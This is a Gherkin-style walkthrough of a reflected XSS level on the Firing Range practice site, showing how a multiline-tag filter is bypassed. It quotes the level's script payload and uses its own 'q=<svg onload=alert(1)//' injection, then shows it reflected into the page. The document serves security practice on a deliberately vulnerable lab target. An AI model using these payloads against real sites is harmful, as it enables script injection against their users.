# language: en

Feature: Tags XSS - Multiline Tags
  From the Firing Range system

  Background:
    Given I'm running Debian GNU/Linux 9 (stretch)
    And also using Chrome Version 69.0.3497.81
    Given the following scenario
    """
    URL: https://public-firing-range.appspot.com/tags/multiline?q=a
    Message: Only multiline tags allowed (%0a<script>alert(1)</script>). The
    server applies a single line regular expression to filter out any tag in
    the request, which can be tricked by a multiline payload.
    Details:
      - The page shows an 'a' on the top
    Objective: Perform an reflected xss on the function of the page
    """
    Scenario: HTML injection attempt
    Given the following HTML code for the page
    """
    <html><body>a</body></html>

    """
    When I see the URL noticed that 'q' parameter is the content of the body
    And the solution is on the message but i wanted to use another method
    And  I replace the 'q' parameter by the following code in html
    """
    q=<svg%20onload=alert(1)//

    """
    Then the page was reloaded with our XSS injection
    """
    <html><body><svg onload=alert(1)//</body></html>

    """
